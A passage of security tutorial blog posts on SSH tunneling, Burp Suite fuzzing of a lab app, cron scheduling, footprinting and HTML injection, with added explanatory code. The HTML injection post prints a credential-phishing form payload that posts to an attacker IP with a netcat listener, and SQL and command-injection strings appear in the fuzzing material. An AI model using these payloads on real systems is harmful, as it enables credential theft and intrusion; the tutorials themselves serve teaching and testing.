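# Added example (not from the original post): the relay that a local forward
# performs, with plain sockets so it runs without PuTTY or an SSH server. The
# forwarder plays "listen on localhost:7000, deliver to 192.168.10.2:22"; the echo
# server is a constructed stand-in for the client machine behind the SSH server.
# Everything binds to loopback on ephemeral ports, so the lab network is not used.


def _pump(src: socket.socket, dst: socket.socket) -> None:
    """Copy bytes src -> dst until src closes, then pass the end-of-stream along."""
    try:
        while True:
            chunk = src.recv(4096)
            if not chunk:
                break
            dst.sendall(chunk)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def start_forwarder(target_host: str, target_port: int,
                    listen_host: str = "127.0.0.1") -> int:
    """Listen on listen_host (ephemeral port) and relay every client to the target.

    Returns the listening port. Binding to 127.0.0.1 is what PuTTY does unless
    "Local ports accept connections from other hosts" is ticked.
    """
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind((listen_host, 0))
    listener.listen(5)

    def accept_loop():
        while True:
            client, _ = listener.accept()
            try:
                upstream = socket.create_connection((target_host, target_port), timeout=5)
                upstream.settimeout(None)
            except OSError:
                client.close()          # target unreachable: drop this client, keep serving
                continue
            threading.Thread(target=_pump, args=(client, upstream), daemon=True).start()
            threading.Thread(target=_pump, args=(upstream, client), daemon=True).start()

    threading.Thread(target=accept_loop, daemon=True).start()
    return listener.getsockname()[1]


def start_echo_server() -> int:
    """Constructed stand-in for the SSH client host: replies 'ECHO:' + what it received."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def handle(conn):
        with conn:
            conn.sendall(b"ECHO:" + conn.recv(4096))

    def serve():
        while True:
            conn, _ = srv.accept()
            threading.Thread(target=handle, args=(conn,), daemon=True).start()

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


def send_through(port: int, payload: bytes) -> bytes:
    """Connect to the forwarder's port (like PuTTY to localhost:7000) and read the reply."""
    with socket.create_connection(("127.0.0.1", port), timeout=5) as s:
        s.sendall(payload)
        s.shutdown(socket.SHUT_WR)
        chunks = []
        while True:
            chunk = s.recv(4096)
            if not chunk:
                break
            chunks.append(chunk)
    return b"".join(chunks)


if __name__ == "__main__":
    echo_port = start_echo_server()
    tunnel_port = start_forwarder("127.0.0.1", echo_port)
    print(send_through(tunnel_port, b"SSH-2.0-probe"))   # b'ECHO:SSH-2.0-probe'
```

The listen_host parameter is the part worth noticing from a hardening point of view: with SSH the same choice is the "accept connections from other hosts" box (GatewayPorts on the server side for a remote forward), and leaving it at loopback keeps the forwarded port from becoming a service for everyone on the remote PC's network.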

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, Social Media Lover and Gadgets. Contact here

The post How to Perform Local SSH Tunneling appeared first on Hacking Articles.

Categories: Cyber India

Beginner Guide to SSH Tunneling (Dynamic Tunneling)

Fri, 28/Jul/2017 - 14:22

Basically, tunneling is a process which allows data sharing or communication between two different networks privately. Tunneling is normally performed by encapsulating the private network data and protocol information inside the public network transmission units, so that the private network protocol information appears to the public network as data.

SSH Tunnel: tunneling is the concept of encapsulating one network protocol inside another; here we put it inside SSH, so all network communication is encrypted. Because tunneling involves repackaging the traffic data into a different form, perhaps with encryption as standard, a third use is to hide the nature of the traffic that is run through the tunnels.

Types of SSH Tunneling:

  1. Dynamic SSH tunneling
  2. Local SSH tunneling
  3. Remote SSH tunneling

Let’s Begin!!

Objective: to establish an SSH connection between a remote PC and a local system on a different network.

Here I have set up my own lab, which consists of three systems in the following network:

  1. SSH server (two Ethernet interfaces)
  2. IP 192.168.1.22 connected to the remote system 192.168.1.21
  3. IP 192.168.10.2 connected to the local network system 192.168.10.2
  4. SSH client (local network) holds IP 192.168.10.2
  5. Remote system (outside network) holds IP 192.168.1.21

In the following image we try to explain the SSH tunneling process, where a remote PC with IP 192.168.1.21 is trying to connect to 192.168.10.2, which is on the intranet of another network. To establish a connection with the SSH client, the remote PC creates an SSH tunnel which connects to the local system via the SSH server.

NOTE: the SSH service must be running on the server as well as on the client machine.

The image given below describes the network configuration of the SSH server, showing its two IPs, 192.168.1.22 and 192.168.0.1, as explained above.

Another image given below describes the network configuration of the SSH client, showing IP 192.168.10.2.

The remote PC (192.168.1.21) tries to connect to the SSH server (192.168.1.22) via port 22 and logs in to the server successfully.

Similarly, the remote PC (192.168.1.21) now tries to connect to the client PC (192.168.10.2) via port 22; since they belong to different networks, it receives a network error.

Steps for SSH dynamic tunneling

  • Use PuTTY to connect to the SSH server (192.168.1.22) via port 22 and choose the option SSH > Tunnels in the left-hand Category column.
  • Give the new forwarded port as 7000 and the connection type as Dynamic, then click on Add.
  • Click on Open when everything is set.

This establishes the connection between the remote PC and the SSH server.

Now open PuTTY again, give the IP of the client system, 192.168.10.2, as the Host Name and 22 as the port for SSH, then click on Open.

In the previously running PuTTY window choose the Proxy option from Category and follow the steps given below:

  • Select the proxy type SOCKS 5
  • Give the proxy hostname as 127.0.0.1 and port 7000
  • Click on Open to establish the connection.

Awesome!! We have successfully accessed the SSH client via port 7000.
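The dynamic forward differs from the local one in that the second PuTTY session names the destination itself, in a SOCKS5 CONNECT request sent to 127.0.0.1:7000, and the SSH server then resolves and connects to it. As an added example (not code from the post or from PuTTY), the functions below build and parse both sides of that exchange as defined in RFC 1928; the destination 192.168.10.2:22 and the proxy port 7000 come from the post, the server replies are constructed.

```python
import socket
import struct

# Added example (not from the original post): the SOCKS5 exchange (RFC 1928) that
# the PuTTY proxy settings above produce between the second PuTTY session and the
# dynamic forward listening on 127.0.0.1:7000. Both sides' messages are built and
# parsed here; the destination and port come from the post, replies are constructed.

SOCKS_VERSION = 5
NO_AUTH = 0x00
NO_ACCEPTABLE = 0xFF
CMD_CONNECT = 0x01
ATYP_IPV4, ATYP_DOMAIN = 0x01, 0x03
REPLY_TEXT = {
    0x00: "succeeded", 0x01: "general SOCKS server failure",
    0x02: "connection not allowed by ruleset", 0x03: "network unreachable",
    0x04: "host unreachable", 0x05: "connection refused", 0x06: "TTL expired",
    0x07: "command not supported", 0x08: "address type not supported",
}


def client_greeting() -> bytes:
    """VER=5, NMETHODS=1, METHODS=[no authentication]: the first bytes PuTTY sends."""
    return bytes([SOCKS_VERSION, 1, NO_AUTH])


def server_method_choice(greeting: bytes) -> bytes:
    """The dynamic forward's answer: accept 'no auth' if offered, else 0xFF (reject)."""
    ver, count = greeting[0], greeting[1]
    if ver != SOCKS_VERSION:
        raise ValueError("not a SOCKS5 greeting")
    methods = greeting[2:2 + count]
    return bytes([SOCKS_VERSION, NO_AUTH if NO_AUTH in methods else NO_ACCEPTABLE])


def connect_request(host: str, port: int) -> bytes:
    """CONNECT to host:port. Dotted quads use ATYP 1; names use ATYP 3, which is
    why a hostname typed into PuTTY is resolved on the SSH server's side."""
    try:
        addr = bytes([ATYP_IPV4]) + socket.inet_aton(host)
    except OSError:
        name = host.encode("idna")
        addr = bytes([ATYP_DOMAIN, len(name)]) + name
    return bytes([SOCKS_VERSION, CMD_CONNECT, 0x00]) + addr + struct.pack("!H", port)


def parse_connect_reply(reply: bytes):
    """Return (code, text, bound_host, bound_port) from the server's CONNECT reply."""
    ver, rep, _reserved, atyp = reply[:4]
    if ver != SOCKS_VERSION:
        raise ValueError("not a SOCKS5 reply")
    if atyp == ATYP_IPV4:
        host, rest = socket.inet_ntoa(reply[4:8]), reply[8:]
    elif atyp == ATYP_DOMAIN:
        n = reply[4]
        host, rest = reply[5:5 + n].decode("idna"), reply[5 + n:]
    else:
        raise ValueError("unsupported address type %d" % atyp)
    (port,) = struct.unpack("!H", rest[:2])
    return rep, REPLY_TEXT.get(rep, "unknown"), host, port


if __name__ == "__main__":
    print(client_greeting().hex())
    print(connect_request("192.168.10.2", 22).hex())
    # Constructed reply: success, bound to 127.0.0.1:7000 (0x1b58).
    print(parse_connect_reply(b"\x05\x00\x00\x01\x7f\x00\x00\x01\x1b\x58"))
```

Because the forward offers only the no-authentication method, anything that can reach the proxy port can drive connections out of the SSH server's network; this is the same reason the proxy listens on 127.0.0.1 in the post's configuration.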

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, Social Media Lover and Gadgets. Contact here

The post Beginner Guide to SSH Tunneling (Dynamic Tunneling) appeared first on Hacking Articles.

Categories: Cyber India

Fuzzing SQL,XSS and Command Injection using Burp Suite

Thu, 27/Jul/2017 - 23:00

From Portswigger

Hello friends!! Today we are going to perform fuzzing testing on bwapp application using burp suite intruder, performing this testing manually is a time consuming and may be boring process for any pentester.

The fuzzing play a vital role in software testing, it is a tool which is use for finding bugs, errors, faults and loophole by injecting a set of partially –arbitrary inputs called fuzz into a program of the application to be tested. Fuzzer tools take structure input in file format to differentiate between valid and invalid inputs. Fuzzer tool are best in identifying vulnerability like sql injection, buffer overflow, xss injection and OS command injection and etc.

Let’s start!!

Fuzzing XSS

 Start burp suite in order to intercept the request and then send intercepted data into Intruder

Many input-based vulnerabilities, such SQL injection, cross-site scripting, and file path traversal can be detected by submitting various test strings in request parameters, and analyzing the application’s responses for error messages and other anomalies.

Considered following as given below:

Configure the position where payload will be inserted, the attack type determine the way in which payloads are assigned to payload positions.

Payload position: test (user input for first name)

Attack type: Sniper (for one payload)

Set payload which will be placed into payload positions during the attack. Choose payload option to configure your simple list of payload for attack. Configure the payload list using one of Burp’s predefined payload lists containing common fuzz strings.

Burp suite intruder contain fuzzing string for testing xss injection, therefore choose fuzzing –xss and click on ADD tab to load this string into simple list as shown in screenshot and at final click on start attack.

It will start attack by sending request which contains random string to test xss vulnerability in the target application. Now from given list of applied string select the payload which has highest length as output as shown in given image, we have select request 1 having length equal to 13926.

Insert selected payload into intercepted request and then forward this request as you can see in given image.

Bravo!!  Fuzzing test is completed and it found that application have bug which lead to xss vulnerability. From screenshot you can see it is showing an xss alert prompt.

Fuzzing OS command injection

Similarly, repeat the same process to intercept the request and then send the intercepted data to Intruder.

Configure the position where the payload will be inserted; the attack type determines how payloads are assigned to the payload positions.

Payload position: www.nsa.gov (user input for target)

Attack type: Sniper (for one payload)

Burp Suite Intruder ships with fuzzing strings that test for OS command injection, so choose Fuzzing - full, click Add to load these strings into the simple list as shown in the screenshot, and finally click Start attack.

Intruder starts the attack by sending requests that carry arbitrary strings, testing for an OS command injection vulnerability in the target application. From the list of responses, select the payload that produced the largest response length, as shown in the image; here we selected request 34, with a length of 13343.

Insert the selected payload into the intercepted request and then forward the request, as shown in the image.

Great Job!! The fuzzing test is complete and shows that the application has a bug leading to an OS command injection vulnerability. In the screenshot you can see the application showing the ID output requested by the selected payload.

Fuzzing SQL

Similarly, repeat the same process to intercept the request and then send the intercepted data to Intruder.

Configure the position where the payload will be inserted; the attack type determines how payloads are assigned to the payload positions. It is much like a brute-force attack.

Payload position: 1:1 (user input for login: password)

Attack type: Cluster bomb (for two payloads)

Burp Suite Intruder ships with fuzzing strings that test for SQL injection, so choose Fuzzing - SQL Injection for the first payload position, click Add to load these strings into the simple list as shown in the screenshot, and finally click Start attack.

Similarly, repeat the same process to set the payload option for the second payload position.

Intruder starts the attack by sending requests that carry arbitrary strings, testing for a SQL injection vulnerability in the target application. From the list of responses, select the payload that produced the largest response length, as shown in the image; here we selected request 168, with a length of 13648.

Insert the selected payload into the intercepted request and then forward the request, as shown in the image.

Wonderful!! The fuzzing test is complete and shows that the application has a bug leading to a SQL injection vulnerability. In the screenshot you can see we have logged into Neo’s account without valid input; this happens only because of the selected payload.
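The two server-side bugs that the command-injection and SQL fuzzing above surface, each shown beside a hardened form, as an added example that is not code from the original post. Function names are hypothetical; the fuzz inputs and the single user row are constructed.

```python
"""Added example (not code from the Hacking Articles post): the "ping a target"
and "login: password" handlers that Intruder's fuzz strings break, each beside
a hardened form. Names are hypothetical; inputs and the user row are constructed."""
import re
import sqlite3

# ---- OS command injection: the "ping a target" form fuzzed with Sniper ----

def build_ping_vulnerable(target: str) -> str:
    # Vulnerable: the user-supplied target is spliced into a shell command line,
    # so a fuzz string such as "www.nsa.gov; id" makes the shell run a second command.
    return "ping -c 1 " + target

# Allowlist: RFC 1123-style hostname labels (dotted IPv4 addresses also pass).
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$")

def build_ping_hardened(target: str) -> list:
    """Validate the target against the allowlist and return an argv list meant
    for subprocess.run(argv) with shell=False; raise ValueError otherwise."""
    if not HOSTNAME_RE.match(target):
        raise ValueError("rejected target: %r" % target)
    return ["ping", "-c", "1", target]

def ping_target_accepted(target: str) -> bool:
    """True if the hardened builder accepts the target (used by the checks)."""
    try:
        build_ping_hardened(target)
        return True
    except ValueError:
        return False

# ---- SQL injection: the "login: password" form fuzzed with Cluster bomb ----

def demo_db() -> sqlite3.Connection:
    """In-memory users table holding one constructed account."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (login TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('neo', 'trinity')")
    return db

def login_vulnerable(db, login: str, password: str) -> bool:
    # Vulnerable: values are concatenated into the statement, so the fuzz string
    #   ' OR '1'='1
    # in both positions turns the WHERE clause into one that is always true.
    sql = ("SELECT 1 FROM users WHERE login = '%s' AND password = '%s'"
           % (login, password))
    return db.execute(sql).fetchone() is not None

def login_hardened(db, login: str, password: str) -> bool:
    # Hardened: bound parameters; the driver passes the fuzz string as a plain literal.
    sql = "SELECT 1 FROM users WHERE login = ? AND password = ?"
    return db.execute(sql, (login, password)).fetchone() is not None
```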

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, Social Media Lover and Gadgets enthusiast.

The post Fuzzing SQL,XSS and Command Injection using Burp Suite appeared first on Hacking Articles.

Categories: Cyber India

Time Scheduling on SSH Port

Tue, 25/Jul/2017 - 13:00

This article is about network security: it helps a network administrator secure a running service on a server by scheduling tasks. We are going to schedule a task for the SSH service to add another layer of security to the network; in simple words, we are going to set a time limit for the SSH service on the server.

Cron is a UNIX-like computer utility which schedules a command or script on your server to run automatically at a specified time and date. A cron job is the scheduled task itself.

service ssh start

service ssh status

As you can see from the image below, the SSH service is running.

We are going to schedule the SSH service using crontab; crontab is the built-in Linux facility for scheduling tasks.

Opening the crontab requires root permission, so type the following command:

sudo crontab -e

We have opened the crontab in nano; the image below shows the crontab interface.

Crontab uses the format “m h dom mon dow [command]”. The following table will help you write a crontab schedule:

Field     Value
m         minute (0-59)
h         hour (0-23)
dom       day of month (1-31)
mon       month (1-12)
dow       day of week (1-7; 1 stands for Monday)
command   the command to be run

Now if we need to schedule a task at 8:00 am on Monday we write the line as follows:

0 8 * * 1 [command]

Now we are going to use crontab to schedule the SSH service. We are going to schedule the SSH service for 3 minutes and have it stop after 4 minutes of use once it is activated.

We use the following line to schedule the task:

* * * * * sleep 180;/usr/sbin/service ssh start

The line above schedules the task for 3 minutes, where 180 seconds equals 3 minutes; to stop the SSH service after that, add the line below, where 240 seconds equals 4 minutes.

* * * * * sleep 240;/usr/sbin/service ssh stop

Let’s check whether the lines above are working or not.

Wait for the service to start. Using nmap we scan port 22:

nmap -p 22 127.0.0.1

After scanning you will observe that the SSH service is running and port 22 is open.

nmap -p 22 127.0.0.1

Now if our lines are working properly the service should stop itself once 4 minutes have passed; we check again using nmap.

The port is now closed at the 4th minute.

Now if I want to schedule a task at a particular time, let’s say I want my SSH service to start at 5:00 am and stop at 5 pm, we use these lines:

0 5 * * * /usr/sbin/service ssh start

0 17 * * * /usr/sbin/service ssh stop

These lines schedule the SSH service to start every day at 5:00 am and stop every day at 5:00 pm.
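A matcher for the five-field crontab format described above, as an added example that is not code from the original post; it checks at which minutes the post's schedule lines fire. Function names are hypothetical and the dates are constructed (25 Jul 2017 is a Tuesday).

```python
"""Added example (not code from the Hacking Articles post): evaluate the
'm h dom mon dow command' crontab format against a given minute.
Function names are hypothetical; test dates are constructed."""
from datetime import datetime

FIELD_RANGES = [(0, 59), (0, 23), (1, 31), (1, 12), (0, 7)]   # m h dom mon dow

def expand_field(field: str, lo: int, hi: int) -> set:
    """Expand one crontab field ('*', '8', '1-5', '*/15', '1,3,5') into its values."""
    values = set()
    for part in field.split(","):
        step = 1
        if "/" in part:
            part, step_text = part.split("/", 1)
            step = int(step_text)
        if part == "*":
            start, end = lo, hi
        elif "-" in part:
            start, end = (int(x) for x in part.split("-", 1))
        else:
            start = end = int(part)
        if not (lo <= start <= end <= hi):
            raise ValueError("field %r is outside %d-%d" % (field, lo, hi))
        values.update(range(start, end + 1, step))
    return values

def parse_crontab_line(line: str):
    """Split 'm h dom mon dow command' into five value sets, the dom/dow wildcard
    flags (cron's day rule depends on them) and the command text."""
    parts = line.split(None, 5)
    if len(parts) < 6:
        raise ValueError("need five schedule fields followed by a command")
    sets = [expand_field(f, lo, hi) for f, (lo, hi) in zip(parts[:5], FIELD_RANGES)]
    if 7 in sets[4]:                      # cron accepts both 0 and 7 for Sunday
        sets[4].add(0)
    wildcards = (parts[2].startswith("*"), parts[4].startswith("*"))
    return sets, wildcards, parts[5]

def fires_at(line: str, when) -> bool:
    """True if the crontab line runs at the given minute (datetime or ISO string)."""
    if isinstance(when, str):
        when = datetime.fromisoformat(when)
    (m, h, dom, mon, dow), (dom_wild, dow_wild), _ = parse_crontab_line(line)
    cron_dow = (when.weekday() + 1) % 7   # Python Monday=0 -> cron Monday=1, Sunday=0
    if dom_wild or dow_wild:
        day_ok = when.day in dom and cron_dow in dow
    else:                                 # both restricted: cron runs if EITHER matches
        day_ok = when.day in dom or cron_dow in dow
    return when.minute in m and when.hour in h and when.month in mon and day_ok

def runs_per_day(line: str, day) -> int:
    """Count the minutes of one calendar day (datetime or 'YYYY-MM-DD') at which
    the line fires. The post's '* * * * * sleep 180;...' line matches all 1440 of
    them: the sleep delays each run, it does not narrow the schedule."""
    if isinstance(day, str):
        day = datetime.fromisoformat(day)
    base = day.replace(hour=0, minute=0, second=0, microsecond=0)
    return sum(fires_at(line, base.replace(hour=hh, minute=mm))
               for hh in range(24) for mm in range(60))
```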

Author: Sayantan Bera is a technical writer at Hacking Articles and a cyber security enthusiast.


Beginner Guide to Website Footprinting

Sun, 23/Jul/2017 - 20:39

In our previous article we gave a brief introduction to footprinting for gathering information related to a specific person. As discussed there, there are many types of footprinting, and today we are going to talk about DNS footprinting, website footprinting and whois footprinting.

Browsing the target website may provide:

Whois details

Software used and version

OS details

Subdomains

File names and file paths

Scripting platform & CMS details

Contact details

Let’s start!!

From Wikipedia 

Whois footprinting

WHOIS (pronounced as the phrase “who is”) is a query and response protocol, and whois footprinting is a method for glancing at ownership information for a domain name, such as:

  • Domain name details
  • Contact details, including the phone number and email address of the owner
  • Registration date of the domain name
  • Expiry date of the domain name
  • Domain name servers

Whois Lookup

It is broadly used for querying databases that store the registered users or assignees of an Internet resource, such as a domain name, an IP address block or an autonomous system, but is also used for a wider range of other information. The protocol stores and delivers database content in a human-readable format.

Browse to http://whois.domaintools.com/ and type any domain name.

For example, let’s search for pentestlab.in.

Now you can see it has produced a whois record for pentestlab.in containing details such as email address, IP and registrant organisation. From the record anyone can guess that this domain has some connection to Raj Chandel, so the attacker would next perform footprinting on Raj Chandel with the help of the previous article.

There are many other tools for whois footprinting, for example:

  • Caller IP
  • Whois Analyzer Pro
  • Whois lookup multiple address

DNS Footprinting

An attacker performs DNS footprinting in order to enumerate DNS record details and the types of servers. There are 10 types of DNS record which provide important information related to the target location:

  1. A/AAAA
  2. SRV
  3. NS
  4. TXT
  5. MX
  6. CNAME
  7. SOA
  8. RP
  9. PTR
  10. HINFO

Domain Dossier: an online tool used for complete DNS footprinting as well as whois footprinting.

There are many online tools for DNS footprinting. Using Domain Dossier we will check the DNS records of pentestlab.in: select the check boxes for DNS records and traceroute and then click Go.

You can observe that the data received from the whois lookup and from Domain Dossier is, to some extent, the same. It gives the same email ID as above, i.e. rrajchandel@gmail.com, and moreover details of the DNS records TXT, SOA, NS, MX, A and PTR.

DNS Dumpster: also an online tool used for DNS footprinting.

DNSdumpster.com is a FREE domain research tool that can discover hosts related to a domain. Enumerate a domain and pull back up to 40K subdomains; results are available in an XLS for easy reference.

Repeating the same process for pentestlab.in, it searches for its DNS records. From the screenshot you can observe we received the same details as above. Moreover it produces a copy of the output as an XLS file.

You Get Signal: also an online tool used for DNS footprinting as well as for network footprinting.

A reverse IP domain check takes a domain name or IP address pointing to a web server and searches for other sites known to be hosted on that same web server. Data is gathered from search engine results, which are not guaranteed to be complete.

Hence we get the IP 72.52.229.111 for pentestlab.in; moreover it dumped the names of 14 other domains hosted on the same web server.

Website Footprinting

It is a technique used for extracting details about a website, such as:

  1. Archived description of the website
  2. Content management system and framework
  3. Script and platform of the website and web server
  4. Web crawling
  5. Extracting meta data and contact details from the website
  6. Website and web page monitoring and analysis

Archive.org: an online tool for visiting archived versions of any website.

Archive.org has a search option, the Wayback Machine, which is like a time machine for any website. It contains information from the past to the present for any website, whether layout or content; everything related to the website is present inside. In simple words, it contains the history of any website.

For example, I searched for the archived record of hackingarticles.in from 2012.

BuiltWith: an online tool for detecting the technologies and frameworks used by a running website.

BuiltWith.com technology tracking includes widgets, analytics, frameworks, content management systems, advertisers, content delivery networks, web standards and web servers, to name some of the technology categories.

Taking hackingarticles.in as an example again, we found the following:

  • Content management system: WordPress
  • Framework: PHP

Whatweb

WhatWeb can identify all sorts of information about a live website, such as: platform, CMS platform, type of script, Google Analytics, web server platform and IP address country. A pentester can use this tool as both a recon tool and a vulnerability scanner.

Open the terminal in Kali Linux and type the following command:

whatweb www.pentestlab.in

As a result we receive the same information as above.

Web crawling

HTTrack is a free and open source web crawler and offline browser, developed by Xavier Roche.

It allows you to download a World Wide Web site from the Internet to a local directory, building recursively all directories and getting HTML, images and other files from the server to your computer. HTTrack preserves the original site’s relative link structure.

Give the target URL to copy the website, here www.pentestlab.in, and it starts downloading the website.

See also: http://www.hackingarticles.in/5-ways-crawl-website/

Web Data Extractor

Web Data Extractor Pro is a web scraping tool specifically designed for mass-gathering of various data types. It can harvest URLs, phone and fax numbers, email addresses, as well as meta tag information and body text. A special feature of WDE Pro is custom extraction of structured data.

Start a new project, type the target URL as ignitetechnologies.in, select a folder to save the output and click OK.

Now this tool will extract meta data, email addresses, contact numbers and so on from the target URL.

From the screenshot you can see it found 40 meta tags, 1 email address and 84 phone numbers on the ignitetechnologies.in website.

Similarly there are other tools that can be used as web data extractors:

Web spider
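What a tool like Web Data Extractor pulls out of a page (meta tags, e-mail addresses, phone numbers), written with the standard library only, as an added example that is not code from the original post or from any of the tools it names. The sample HTML is constructed and the function names are hypothetical; running it against your own site shows what a footprinter would collect.

```python
"""Added example (not code from the Hacking Articles post): extract meta tags,
e-mail addresses and phone numbers from a page, the data the post says Web Data
Extractor harvests. SAMPLE_HTML is constructed; names are hypothetical."""
import re
from html.parser import HTMLParser

SAMPLE_HTML = """<html><head>
<meta name="description" content="IgniteTechnologies - security training">
<meta name="keywords" content="pentest, training">
<meta name="generator" content="WordPress 4.8">
</head><body>
<p>Contact us: <a href="mailto:info@example.com">info@example.com</a>
or call +91 11 2345 6789 / (555) 123-4567.</p>
<p>Admin: admin@example.com</p>
</body></html>"""

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
# Loose phone pattern: optional '(' or '+', then at least 9 digits with separators.
PHONE_RE = re.compile(r"\(?\+?\d[\d\s().-]{7,}\d")

class MetaAndTextExtractor(HTMLParser):
    """Collects <meta name/property=... content=...> pairs and the visible text."""
    def __init__(self):
        super().__init__()
        self.meta = {}
        self.text_parts = []

    def handle_starttag(self, tag, attrs):
        if tag == "meta":
            a = dict(attrs)
            name = a.get("name") or a.get("property")
            if name and a.get("content") is not None:
                self.meta[name.lower()] = a["content"]

    def handle_data(self, data):
        self.text_parts.append(data)

def extract_site_data(html: str) -> dict:
    """Return {'meta': {...}, 'emails': [...], 'phones': [...]} for one page."""
    parser = MetaAndTextExtractor()
    parser.feed(html)
    visible = " ".join(parser.text_parts)
    # E-mails also hide in attributes (mailto: links), so scan the raw HTML too.
    emails = sorted(set(EMAIL_RE.findall(visible + " " + html)))
    phones = sorted(set(m.strip() for m in PHONE_RE.findall(visible)))
    return {"meta": parser.meta, "emails": emails, "phones": phones}
```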

Competitive Intelligence

Website-Watcher is a powerful yet simple website-monitoring tool, perfectly suited to the beginner and advanced user alike. You can download it from here.

Open a new tab and enter the target URL, which starts monitoring the target website.

For example, I entered the URL hackingarticles.in to monitor this website.

Similarly there are some other tools used for monitoring:

On web change

Follow that page

Informinder

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, Social Media Lover and Gadgets enthusiast.


Beginner Guide to HTML Injection

Fri, 21/Jul/2017 - 23:02

From W3schools

HTML is the standard Hyper Text Markup Language used for designing web pages.

  • HTML describes the structure of Web pages using markup.
  • HTML elements are the building blocks of HTML pages.
  • HTML elements are represented by tags.
  • HTML tags label pieces of content such as “heading”, “paragraph”, “table”, and so on.
  • Browsers do not show the HTML tags, but use them to render the content of the page.

HTML Tags

HTML tags are element names surrounded by angle brackets. There are two types of tag: the start tag, also known as the opening tag, and the end tag, also known as the closing tag.

HTML Elements

An HTML element usually consists of a start tag and an end tag, with the content inserted in between.

HTML Attributes

Attributes provide additional information about HTML elements. Attributes generally come in the form of name/value pairs like name="value".

Create a web page using HTML

Generally “Notepad” is used for writing HTML code; save the text file with a .html/.htm extension, for example “test.html”, then open the saved file in any web browser.

To create a simple web page, type the following code inside Notepad and save it as test.html:

<!DOCTYPE html>
<html>
<head>
<title> HTML TUTORIALS</title>
</head>
<body bgcolor="pink">
<br>
<center><h2>WELCOME TO HACKING ARTICLES </h2>
<br>
<p>Author "Raj chandel"</p>
</center>
</body>
</html>

When you open test.html in a web browser you will see the image below.

The <!DOCTYPE html> declaration defines this document to be HTML5

The <html> element is the root element of an HTML page

The <head> element contains meta information about the document

The <title> element specifies a title for the document

The <body> element contains the visible page content; it has the bgcolor attribute set to “pink”

The <br> element defines a line break

The <h1> element defines a large heading

The <p> element defines a paragraph

HTML Versions

Since the early days of the web, there have been many versions of HTML:

Version     Year
HTML        1991
HTML 2.0    1995
HTML 3.2    1997
HTML 4.01   1999
XHTML       2000
HTML5       2014

To learn more about HTML visit w3schools.com

HTML injection

HTML injection is a vulnerability in a website that occurs when user input is not correctly sanitized and the output is not encoded, so an attacker is able to inject valid HTML code into a vulnerable web page. There are many techniques which could use elements and attributes to submit HTML content.

If these methods are provided with untrusted input, there is a high risk of XSS, specifically HTML injection. If strings are not correctly sanitized the problem could lead to XSS-based HTML injection.

This vulnerability can have many consequences, such as disclosure of a user’s session cookies that could be used to impersonate the victim, or, more generally, it can allow the attacker to modify the page content seen by the victims.

There are two types of HTML injection:

  • Stored HTML
  • Reflected HTML

Stored HTML

Stored HTML injection is also known as persistent, because the injected malicious script gets permanently stored on the web server and the application serves it back to the user when he visits the respective website. Hence when the client clicks on the payload, which appears as an official part of the website, the injected HTML code is rendered by the browser. The most common example is the comment option on blogs, which allows users to post their comment for the administrator or other users.

Example:

An example of a web application vulnerable to stored HTML injection, which allows users to submit their entry in a blog, is shown in the screenshot.

Firstly user “raj” made a normal entry, which was successfully added to the web server database.

Enter the following HTML code inside the given text area to make the HTML attack:

<div style="position: absolute; left: 0px; top: 0px; width: 1900px; height: 1300px; z-index: 1000; background-color:white; padding: 1em;">Please login with valid credentials:<br><form name="login" action="http://192.168.1.104/login.htm"><table><tr><td>Username:</td><td><input type="text" name="username"/></td></tr><tr><td>Password:</td><td><input type="text" name="password"/></td></tr><tr><td colspan=2 align=center><input type="submit" value="Login"/></td></tr></table></form></div>

The HTML code above creates a fake user login page on the targeted web page and forwards the entered credentials to the attacker’s IP.

You can see below that the login page looks valid to the user and is stored on the web server.

Now when the victim opens the malicious login page he will receive the web page above, which looks official to him, and he will submit his credentials on that page. As he does so, the request will be forwarded to the attacker’s IP address.

nc -vlp 80

The attacker receives the user’s credentials as a response in netcat. From the screenshot you can read username=bee & password=bug

Now the attacker will use these credentials to log in.

Reflected HTML

Reflected HTML injection, also known as non-persistent, occurs when the web application responds immediately to the user’s input without validating it; this lets an attacker inject browser-executable code inside a single HTML response. It is named “non-persistent” since the malicious script does not get stored on the web server, so the attacker sends the malicious link through phishing to trap the user.

The most common application of this kind of vulnerability is in search engines on websites: the attacker writes some arbitrary HTML code in the search textbox and, if the website is vulnerable, the result page will render those HTML entities.

Example:

The following web page allows the user to submit his first and last name, but these text fields are vulnerable to HTML injection.

Now type the following HTML code in the text field given for the first name; it creates a link to hackingarticles.in that is followed when you click on “RAJ”:

<h1><a href="http://www.hackingarticles.in">RAJ</a></h1>

Similarly type the following code in the text field given for the last name:

<h2>CHANDEL</h2>

Click the Go button to submit these as first and last name.

From the screenshot you can see it has submitted RAJ CHANDEL, and the word “RAJ” contains a link to hackingarticles.in; when you click on the link it forwards you to hackingarticles.in.
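The first/last-name handler from the reflected example, vulnerable beside its encoded form, plus a scanner that flags stored blog entries carrying the kind of overlay login form used in the stored example, as an added example that is not code from the original post. Function names, the site host and the shortened payload sample are constructed.

```python
"""Added example (not code from the Hacking Articles post): output encoding for
the reflected first/last-name page, and a check over stored entries for the
markup the stored-injection payload relies on. Names are hypothetical."""
import html
from html.parser import HTMLParser
from urllib.parse import urlparse

def greet_vulnerable(first: str, last: str) -> str:
    # Vulnerable: raw input goes straight into the response, so
    # <h1><a href="http://www.hackingarticles.in">RAJ</a></h1> renders as markup.
    return "<p>Welcome " + first + " " + last + "</p>"

def greet_hardened(first: str, last: str) -> str:
    # Fixed: encode for the HTML text context; the same input is displayed as text.
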